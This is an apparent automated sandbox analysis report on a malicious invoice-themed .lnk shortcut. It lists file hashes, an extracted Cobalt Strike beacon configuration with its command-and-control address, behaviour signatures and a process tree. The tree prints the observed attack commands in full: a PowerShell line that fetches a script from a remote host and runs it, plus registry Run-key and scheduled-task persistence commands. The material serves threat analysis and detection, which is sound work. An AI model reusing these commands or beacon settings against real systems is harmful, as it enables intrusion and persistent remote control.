Analysis
- max time kernel: 114s
- max time network: 140s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
- submitted: 06-02-2023 16:44
Static task: static1
Behavioral task: behavioral1
  Sample: Overdue_Invoice_2023B.pdf.lnk
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: Overdue_Invoice_2023B.pdf.lnk
  Resource: win10v2004-20220812-en
General
- Target: Overdue_Invoice_2023B.pdf.lnk
- Size: 1KB
- MD5: 094815ab6988cda2101381cbeeb0056e
- SHA1: df5f22ce9d8e0ee3ebca101f5112c6456088d317
- SHA256: 0135c4f45de3e2187708033da3135210b03c9db4275dfa794dbcbff21b4f4df9
- SHA512: c8f3aae210a0157275c0f24e9175ef9d508c55fd5c8e48e6c10e95a79a9f41927d5574dc5197c9594f6fbfefe3eb19f851570c6bb5e0eaecd6311731e26e4363
Malware Config
Extracted
cobaltstrike
987654321
http://185.225.74.52:443/favicon.js
- access_type: 512
- beacon_type: 2048
- host: 185.225.74.52,/favicon.js
- http_header1:
- http_header2:
- http_method1: GET
- http_method2: POST
- jitter: 9472
- polling_time: 55991
- port_number: 443
- sc_process32: %windir%\syswow64\dllhost.exe
- sc_process64: %windir%\sysnative\dllhost.exe
- state_machine:
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMEuNG3asVOp+bgSmSog10bB55R9e+aj5dF2sVbnRjA/dTkltRdDD0DdF5vJh/gURBikZ4FxqqmfqR2SPAheOzDDrYvV7ScpwPkZe8IUd/DbJmPs30ST9SGHn+eLjTQQEU+I142t7yTsO7HCKf1CTDMHfS3PNoz3V8ivNRwL1aiQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- unknown1: 9.63976192e+08
- unknown2:
AAAABAAAAAIAAANxAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- uri: /btn_bg
- user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/42.0.2311.135
- watermark: 987654321
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
description           pid   process            target process
PID 4380 created 760  4380  RuntimeBroker.exe  Explorer.EXE
PID 4380 created 760  4380  RuntimeBroker.exe  Explorer.EXE
-
Blocklisted process makes network request 2 IoCs
Processes:
flow  pid   process
19    1308  powershell.exe
20    1100  powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description        ioc                                                                                                  process
Key value queried  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation  cmd.exe
-
Executes dropped EXE 1 IoCs
Processes:
pid   process
4380  RuntimeBroker.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid   process
4380  RuntimeBroker.exe
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description      ioc  process
Key created      \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run  reg.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftLibrary = "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\\Libraries\\MicrosoftLibrary; Start-Process $env:Public\\Libraries\\MicrosoftLibrary\\RuntimeBroker.exe\""  reg.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description        ioc                                                                 process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0       AcroRd32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  AcroRd32.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies Internet Explorer settings 1 IoCs
Processes:
description  ioc  process
Key created  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION  AcroRd32.exe
-
Modifies registry class 1 IoCs
Processes:
description  ioc                                                                             process
Key created  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings  powershell.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
pid   process            count
1308  powershell.exe     2
1100  powershell.exe     2
4380  RuntimeBroker.exe  2
2132  AcroRd32.exe       18
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
pid   process            count
4380  RuntimeBroker.exe  2
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  1308  powershell.exe
Token: SeDebugPrivilege  1100  powershell.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid   process
2132  AcroRd32.exe
-
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
pid   process       count
2132  AcroRd32.exe  7
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description                       pid   process         target process  count
PID 5000 wrote to memory of 1308  5000  cmd.exe         powershell.exe  3
PID 1308 wrote to memory of 1100  1308  powershell.exe  powershell.exe  3
PID 1100 wrote to memory of 2132  1100  powershell.exe  AcroRd32.exe    3
PID 1100 wrote to memory of 2140  1100  powershell.exe  attrib.exe      3
PID 2132 wrote to memory of 2572  2132  AcroRd32.exe    RdrCEF.exe      3
PID 2572 wrote to memory of 4484  2572  RdrCEF.exe      RdrCEF.exe      41
PID 2572 wrote to memory of 4312  2572  RdrCEF.exe      RdrCEF.exe      8
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023B.pdf.lnk
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/s4Nt4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
-
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
-
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Invoice.pdf"
      - Checks processor information in registry
      - Modifies Internet Explorer settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
-
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        - Suspicious use of WriteProcessMemory
-
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=21B5C907505A0E52617CE897434ABB30 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4782532CF8BFD166D6E977C81EDEC328 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4782532CF8BFD166D6E977C81EDEC328 --renderer-client-id=2 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job /prefetch:1
-
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7AC83CBFEE2F13C70836B7A7055C51CE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7AC83CBFEE2F13C70836B7A7055C51CE --renderer-client-id=4 --mojo-platform-channel-handle=2180 --allow-no-sandbox-job /prefetch:1
-
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2D1AD4ADF0C97CDFCDF1449F3A8DD10A --mojo-platform-channel-handle=2212 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3DC38C5C32415F51F53A42E9A2004E0D --mojo-platform-channel-handle=2632 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5FC3B0A6BAF7827216FD4F026B9F8376 --mojo-platform-channel-handle=2408 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
      C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953
      - Views/modifies file attributes
-
      C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
        C:\Windows\System32\cmd.exe
        /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
-
          C:\Windows\system32\reg.exe
          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
          - Adds Run key to start application
          - Modifies registry key
-
        C:\Windows\System32\schtasks.exe
        /F /Create /TN Microsoft_Library /sc minute /MO 80 /TR "powershell.exe -WindowStyle hidden -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe
        - Creates scheduled task(s)
-
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
-
  C:\windows\system32\wermgr.exe
  "C:\windows\system32\wermgr.exe"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize  2KB
MD5       da716b5cb0693cd2dbbfd96430f6ec86
SHA1      84f1cc86cc4318d1033e8c435e8d5366f454f998
SHA256    9dd85493e4642fb90dbb13a2fc254023abba467f0a4a41b83f97f7fe3826ec0f
SHA512    cd010f7d327f2e66def5d08d9366d5ae03f69c8ac87f8b697ed17fbbd9b82f2a7b482509a2aae25d5fd53677906a53d9eda13d8cbf25bfc3654d3cb93b2b0c9e
-
C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exe
Filesize  100KB
MD5       ba4cfe6461afa1004c52f19c8f2169dc
SHA1      ab8539ef6b2a93ff9589dec4b34a0257b6296c92
SHA256    e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628
SHA512    2c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0
-
C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exe
Filesize  100KB
MD5       ba4cfe6461afa1004c52f19c8f2169dc
SHA1      ab8539ef6b2a93ff9589dec4b34a0257b6296c92
SHA256    e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628
SHA512    2c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0
-
C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\UMPDC.dll
Filesize  391KB
MD5       1570c92c1c5f039c438295ac68ff7e82
SHA1      3ee6c1d3582361e8af4efec44b1d1420494ab728
SHA256    b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4
SHA512    fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992
-
C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\info.txt
Filesize  174KB
MD5       ec5071963e2367e037a45fab530a5458
SHA1      fe9c636957dce8e9d633a5689466041637a70c26
SHA256    d4219b706d7d914ba1e0dc0c32804b522d3b38f0947e3b902a02c35d89f56259
SHA512    81f88a30d73bb468f95a6905c893c9100a2c83d6a69c2712265df0192f8e3400df6ad30e1a567a8472b999af38db8d583b7d234526095f0f4b1a5267081855aa
-
C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\umpdc.dll
Filesize  391KB
MD5       1570c92c1c5f039c438295ac68ff7e82
SHA1      3ee6c1d3582361e8af4efec44b1d1420494ab728
SHA256    b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4
SHA512    fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992
-
C:\Users\Admin\Downloads\Invoice.pdf
Filesize  6KB
MD5       662e6c1a869b8a4abc54a7ed8bc23088
SHA1      c16f1dfa1f2488072d87f100a7d11ecaf90ca9d4
SHA256    15d2050a1a60c36ae602981ac19e371a6fae40aed0f5aee6334fbcc721e5b140
SHA512    5bd17a8cbbb0a7a9565d434cfc507213c91bfeac4cea6b7ea0908ec71fbbcf9f3956d1b9b6c9059dbd466f5cfa7efa2948bc338a4331401b4c8be1e5343c9c99
-
memory/1100-143-0x0000000006DA0000-0x0000000006E16000-memory.dmp
Filesize  472KB
-
memory/1100-152-0x0000000007470000-0x000000000748E000-memory.dmp
Filesize  120KB
-
memory/1100-141-0x0000000000000000-mapping.dmp
-
memory/1100-142-0x0000000005E70000-0x0000000005EB4000-memory.dmp
Filesize  272KB
-
memory/1100-155-0x0000000004830000-0x000000000483A000-memory.dmp
Filesize  40KB
-
memory/1100-144-0x0000000007120000-0x00000000071B6000-memory.dmp
Filesize  600KB
-
memory/1100-145-0x00000000070C0000-0x00000000070E2000-memory.dmp
Filesize  136KB
-
memory/1100-146-0x00000000080D0000-0x0000000008674000-memory.dmp
Filesize  5.6MB
-
memory/1100-154-0x0000000004810000-0x0000000004822000-memory.dmp
Filesize  72KB
-
memory/1100-153-0x0000000007C50000-0x0000000007C5A000-memory.dmp
Filesize  40KB
-
memory/1100-149-0x0000000007B20000-0x0000000007B52000-memory.dmp
Filesize  200KB
-
memory/1100-150-0x0000000070870000-0x00000000708BC000-memory.dmp
Filesize  304KB
-
memory/1100-151-0x0000000070DF0000-0x0000000071144000-memory.dmp
Filesize  3.3MB
-
memory/1308-136-0x00000000063B0000-0x0000000006416000-memory.dmp
Filesize  408KB
-
memory/1308-134-0x0000000005D10000-0x0000000006338000-memory.dmp
Filesize  6.2MB
-
memory/1308-137-0x0000000006420000-0x0000000006486000-memory.dmp
Filesize  408KB
-
memory/1308-132-0x0000000000000000-mapping.dmp
-
memory/1308-138-0x0000000006A40000-0x0000000006A5E000-memory.dmp
Filesize  120KB
-
memory/1308-135-0x0000000005B90000-0x0000000005BB2000-memory.dmp
Filesize  136KB
-
memory/1308-140-0x0000000006F20000-0x0000000006F3A000-memory.dmp
Filesize  104KB
-
memory/1308-133-0x0000000003590000-0x00000000035C6000-memory.dmp
Filesize  216KB
-
memory/1308-139-0x00000000082B0000-0x000000000892A000-memory.dmp
Filesize  6.5MB
-
memory/1520-175-0x0000000000000000-mapping.dmp
-
memory/1708-193-0x0000000000000000-mapping.dmp
-
memory/2132-147-0x0000000000000000-mapping.dmp
-
memory/2140-156-0x0000000000000000-mapping.dmp
-
memory/2572-157-0x0000000000000000-mapping.dmp
-
memory/3852-178-0x0000000000000000-mapping.dmp
-
memory/4248-188-0x000001378DA70000-0x000001378DAB4000-memory.dmp
Filesize  272KB
-
memory/4248-186-0x0000000000000000-mapping.dmp
-
memory/4248-189-0x000001378DC10000-0x000001378DC8E000-memory.dmp
Filesize  504KB
-
memory/4312-162-0x0000000000000000-mapping.dmp
-
memory/4360-191-0x0000000000000000-mapping.dmp
-
memory/4380-180-0x0000000000000000-mapping.dmp
-
memory/4380-187-0x00007FFF9A390000-0x00007FFF9A585000-memory.dmp
Filesize  2.0MB
-
memory/4380-194-0x00007FFF9A390000-0x00007FFF9A585000-memory.dmp
Filesize  2.0MB
-
memory/4484-159-0x0000000000000000-mapping.dmp
-
memory/4584-192-0x0000000000000000-mapping.dmp
-
memory/4820-172-0x0000000000000000-mapping.dmp
-
memory/5008-167-0x0000000000000000-mapping.dmp